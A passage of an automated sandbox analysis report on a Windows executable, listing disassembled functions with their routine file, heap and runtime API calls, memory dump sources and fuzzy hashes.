                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBCMT ref: 004124DC
                                                                                  • _malloc.LIBCMT ref: 004124F6
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  • _memset.LIBCMT ref: 00412549
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateException@8HeapThrow_malloc_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3965744532-0
                                                                                  • Opcode ID: 5fe1e4f97fa9e211ee17084620d103a7d09ce5600d60130a885b20d2347bc829
                                                                                  • Instruction ID: 51269822a4ebdb960cecbe3bc0489266129fd98c847df25caf6003947ae78722
                                                                                  • Opcode Fuzzy Hash: 5fe1e4f97fa9e211ee17084620d103a7d09ce5600d60130a885b20d2347bc829
                                                                                  • Instruction Fuzzy Hash: 214104B0901744ABEB21DE78DAC47DA77D0AB14305F10482FE489D7241D7B8AAE0875C
                                                                                  Function 004089C9 Relevance: 4.6, APIs: 3, Instructions: 104fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,0040BA0F,?,?,00000000,?,?,0041225E,?,?,?,00000001,?), ref: 004089E5
                                                                                  • WriteFile.KERNEL32(00000001,?,00004000,?,00000000,?,?,0040BA0F,?,?,00000000,?,?,0041225E,?,?), ref: 00408A21
                                                                                  • WriteFile.KERNELBASE(00000001,?,00000000,?,00000000,?,?,?,?,?,0040BA0F,?,?,00000000,?,?), ref: 00408A4D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$Handle
                                                                                  • String ID:
                                                                                  • API String ID: 4209713984-0
                                                                                  • Opcode ID: 60fdaaf5b18fd68c24a91242a2dbbc34deab907d478245023e1af0c3568f0ee7
                                                                                  • Instruction ID: 7dafab93038a227be19c913a50d78580f7211669e4596883db46a55b3dbd462d
                                                                                  • Opcode Fuzzy Hash: 60fdaaf5b18fd68c24a91242a2dbbc34deab907d478245023e1af0c3568f0ee7
                                                                                  • Instruction Fuzzy Hash: 0531F271340604AFDB249F24CA44BBB77A9EB94710F04813FE896AB6C1DB38AD45CF19
                                                                                  Function 004091E9 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00409FAA: _wcslen.LIBCMT ref: 00409FB0
                                                                                  • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,?,?,?,0040933E,?,00000001,00000000,?,?,?,?,?), ref: 00409219
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,?,00000800,00000000,00000000,?,?,?,0040933E,?,00000001,00000000,?,?), ref: 00409248
                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,?,0040933E,?,00000001,00000000,?,?,?,?,?,?,0040672F), ref: 00409261
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2260680371-0
                                                                                  • Opcode ID: 414090fd1d27a7ec09d3ce4284bc2b3f1832e7866cd796565000b453ae27314c
                                                                                  • Instruction ID: 23bfc136bf6baec306a6366cc8aa037d8679fca5358ed8655fcd7ed6102d0436
                                                                                  • Opcode Fuzzy Hash: 414090fd1d27a7ec09d3ce4284bc2b3f1832e7866cd796565000b453ae27314c
                                                                                  • Instruction Fuzzy Hash: 9F012E2520420575EF2167264C05FBB722C9B86B84F0848BFF941F22D3CA3CEC92867A
                                                                                  Function 0040E187 Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040E18C
                                                                                  • _wcscpy.LIBCMT ref: 0040E1AC
                                                                                    • Part of subcall function 00410AC0: _wcslen.LIBCMT ref: 00410AD6
                                                                                    • Part of subcall function 00410AC0: _wcscpy.LIBCMT ref: 00410AEC
                                                                                  • _wcscpy.LIBCMT ref: 0040E1CA
                                                                                    • Part of subcall function 00407096: __EH_prolog.LIBCMT ref: 0040709B
                                                                                    • Part of subcall function 00406FBA: __EH_prolog.LIBCMT ref: 00406FBF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_wcscpy$_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2067596392-0
                                                                                  • Opcode ID: 62faf8865d871e777e31c7bdaaaf3d23f743130b80ce5055fa305da7b72432e0
                                                                                  • Instruction ID: 27d61f072e75d13073c2fbb57f14699bfe0c36fd78bc515b06fc75f56fee3a50
                                                                                  • Opcode Fuzzy Hash: 62faf8865d871e777e31c7bdaaaf3d23f743130b80ce5055fa305da7b72432e0
                                                                                  • Instruction Fuzzy Hash: D0113A75A0A254FED701EB65E8427CD7BB1EB16718F14406FF04462282CFBD1A51CB6E
                                                                                  Function 00401790 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: CMT
                                                                                  • API String ID: 3519838083-2756464174
                                                                                  • Opcode ID: 96e274538cfab30d32c2c5afd198a28cd0a783dd8aa7f54393f5780403129076
                                                                                  • Instruction ID: ba9e54cebe165e43e12e4b41765bdf979fe8c4f2b39543410f45230b8d029d34
                                                                                  • Opcode Fuzzy Hash: 96e274538cfab30d32c2c5afd198a28cd0a783dd8aa7f54393f5780403129076
                                                                                  • Instruction Fuzzy Hash: A221C371604554AFCB15AF6488909AEBBA9EF45324B04C06EF856673A2C7395E01CB68
                                                                                  Function 00401106 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _realloc.LIBCMT ref: 0040115B
                                                                                    • Part of subcall function 004063AD: __vswprintf_c_l.LIBCMT ref: 004063CB
                                                                                  Strings
                                                                                  • Maximum allowed array size (%u) is exceeded, xrefs: 0040112C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __vswprintf_c_l_realloc
                                                                                  • String ID: Maximum allowed array size (%u) is exceeded
                                                                                  • API String ID: 620378156-979119166
                                                                                  • Opcode ID: ac7e39a56722bfb5e628e20bc35834a97851e67a4835175f81a6780a152830dd
                                                                                  • Instruction ID: bb51bb8f72ddee3e18bd46bc894267ff4a261c1e0a85f7424ebd2ae05975c311
                                                                                  • Opcode Fuzzy Hash: ac7e39a56722bfb5e628e20bc35834a97851e67a4835175f81a6780a152830dd
                                                                                  • Instruction Fuzzy Hash: C701A2353003055FD728AA25D89193FB3DAEF88764310443FE9ABA7B91EA39BC508718
                                                                                  Function 00401440 Relevance: 3.3, APIs: 2, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: cd7338f795f66c19b3d9cd1e26c83d9273c7355705f52096d0b564cf6d22c47a
                                                                                  • Instruction ID: e30dfece3b806704b98678fd7eff66dc4256349ef370d001556c8b63c1fc4a25
                                                                                  • Opcode Fuzzy Hash: cd7338f795f66c19b3d9cd1e26c83d9273c7355705f52096d0b564cf6d22c47a
                                                                                  • Instruction Fuzzy Hash: F9A1A470A00B449FDB31DB78C8447ABBBE5AF45304F14496FE0A6E72E1C779A881CB59
                                                                                  Function 00408843 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,?,?,-00000011,?,00408697,?,-00000011,?), ref: 004088C5
                                                                                  • CreateFileW.KERNEL32(?,000000FF,?,00000000,00000002,00000000,00000000,?,?,00000800,?,?,?,-00000011,?,00408697), ref: 004088FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: a4ede3637f81c6399fe517e098df117480547d4bd77c9e53a4a01029ce24adf2
                                                                                  • Instruction ID: 784a8f5131ab6fe8d16b89489c66080721abb018ebdeb7173a8cdc1c7e52f572
                                                                                  • Opcode Fuzzy Hash: a4ede3637f81c6399fe517e098df117480547d4bd77c9e53a4a01029ce24adf2
                                                                                  • Instruction Fuzzy Hash: 4C210672000709AFDB20AF248D41EEA7BB9EB04324F40C53EF5D5972D1CA79DD859B58
                                                                                  Function 00408C55 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FlushFileBuffers.KERNEL32(?), ref: 00408C6F
                                                                                  • SetFileTime.KERNELBASE(?,00000000,00000000,00000000,?,?,?), ref: 00408D16
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersFlushTime
                                                                                  • String ID:
                                                                                  • API String ID: 1392018926-0
                                                                                  • Opcode ID: 77b2b841dbfb1dd3bf3fae68253bd11748802c7ac217e7d98abe305092b574c6
                                                                                  • Instruction ID: 9934343912befec5579582a579c8f78507b0e2abfc909207551953b2bb2c960f
                                                                                  • Opcode Fuzzy Hash: 77b2b841dbfb1dd3bf3fae68253bd11748802c7ac217e7d98abe305092b574c6
                                                                                  • Instruction Fuzzy Hash: FA21D531A05148AFEB15CF68CA45FEE7BB49F11314F18802EE895EB2C0DB38DA45C768
                                                                                  Function 00401313 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00401318
                                                                                    • Part of subcall function 00402C8F: __EH_prolog.LIBCMT ref: 00402C94
                                                                                  • _wcslen.LIBCMT ref: 004013BA
                                                                                    • Part of subcall function 0041A27A: __lock.LIBCMT ref: 0041A298
                                                                                    • Part of subcall function 0041A27A: ___sbh_find_block.LIBCMT ref: 0041A2A3
                                                                                    • Part of subcall function 0041A27A: ___sbh_free_block.LIBCMT ref: 0041A2B2
                                                                                    • Part of subcall function 0041A27A: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041ED34,00000000,0042D8B8,0000000C,0041ED6E,00000000,0041A71B,?,004251F8,00000004,0042DAA0,0000000C), ref: 0041A2E2
                                                                                    • Part of subcall function 0041A27A: GetLastError.KERNEL32(?,004251F8,00000004,0042DAA0,0000000C,004210EE,00000000,0041A72A,00000000,00000000,00000000,?,0041E716,00000001,00000214), ref: 0041A2F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2367413355-0
                                                                                  • Opcode ID: 9b806b1359a32eee616e084e0610277f25a75823928bb00d0b22addce5a9ba26
                                                                                  • Instruction ID: 3a55d338a65da8f96d8438de8baa1fb22c516d62b219eb91f85df80b6fbcccb4
                                                                                  • Opcode Fuzzy Hash: 9b806b1359a32eee616e084e0610277f25a75823928bb00d0b22addce5a9ba26
                                                                                  • Instruction Fuzzy Hash: F121A131800205EBDF11AF95E801AEEBBB9EF08704F10417FF815B26A1C73D0A91DB89
                                                                                  Function 0040E608 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040E60D
                                                                                    • Part of subcall function 0040184A: __EH_prolog.LIBCMT ref: 0040184F
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 00401992
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 004019A1
                                                                                    • Part of subcall function 0040184A: _memset.LIBCMT ref: 004019B0
                                                                                    • Part of subcall function 00401790: __EH_prolog.LIBCMT ref: 00401795
                                                                                  • _malloc.LIBCMT ref: 0040E675
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog_memset$AllocateHeap_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 47157355-0
                                                                                  • Opcode ID: f20aaa6ceb426e52629ba7c54288e2a34bf7f33bf22dafb0c778fbdc05834582
                                                                                  • Instruction ID: 12e2d36743818a4afdaa2ebb84b17aaebdecbea8ad3659f9ce02ebd1e3ff5b4a
                                                                                  • Opcode Fuzzy Hash: f20aaa6ceb426e52629ba7c54288e2a34bf7f33bf22dafb0c778fbdc05834582
                                                                                  • Instruction Fuzzy Hash: 5D216D72900218DFCF05DF95D8819EEBBB8BF18308F40496FE006B3291EA395A55CB69
                                                                                  Function 00408ACE Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408B01
                                                                                  • GetLastError.KERNEL32(?,?), ref: 00408B0E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: bc5cc84f90a44e3402344609fbe591a0f94b3c4423ccc248817a00e96404d68b
                                                                                  • Instruction ID: 1a2c250e95b9ae838a8f6684677bec29d6ee1f68e8b1ee2c42085224d69d667d
                                                                                  • Opcode Fuzzy Hash: bc5cc84f90a44e3402344609fbe591a0f94b3c4423ccc248817a00e96404d68b
                                                                                  • Instruction Fuzzy Hash: 5801F5B2B02604BFD720A7788E428AB76ADCB84334714433FB552E33C1DA79AD009279
                                                                                  Function 00408E6B Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,?,00000001,00000001,?,?,?,?,00408EF1,00000001,00000001,00000000,?,00407CEE,?,?), ref: 00408EBE
                                                                                  • GetLastError.KERNEL32(00408EF1,00000001,00000001,00000000,?,00407CEE,?,?,?,?,?,?,?,?,00000000,?), ref: 00408ECA
                                                                                    • Part of subcall function 00408D23: __EH_prolog.LIBCMT ref: 00408D28
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileH_prologLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 4236474358-0
                                                                                  • Opcode ID: 4f1fe507e24abfc9ff72860ed08c9b0e893e9299333d02d570664177b79ae1b2
                                                                                  • Instruction ID: 192c80b46441ab47ceee562e6a2b488ff6d5d822f5f6ee3dcc3f87b66fb43dad
                                                                                  • Opcode Fuzzy Hash: 4f1fe507e24abfc9ff72860ed08c9b0e893e9299333d02d570664177b79ae1b2
                                                                                  • Instruction Fuzzy Hash: 7F019231100318EBCB249F14CE0869B77A5FF50725F144A3EF8A1E22E0DB79E955DA99
                                                                                  Function 0041A60A Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 0041A624
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  • __CxxThrowException@8.LIBCMT ref: 0041A669
                                                                                    • Part of subcall function 00411EDB: std::exception::exception.LIBCMT ref: 00411EE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateException@8HeapThrow_mallocstd::exception::exception
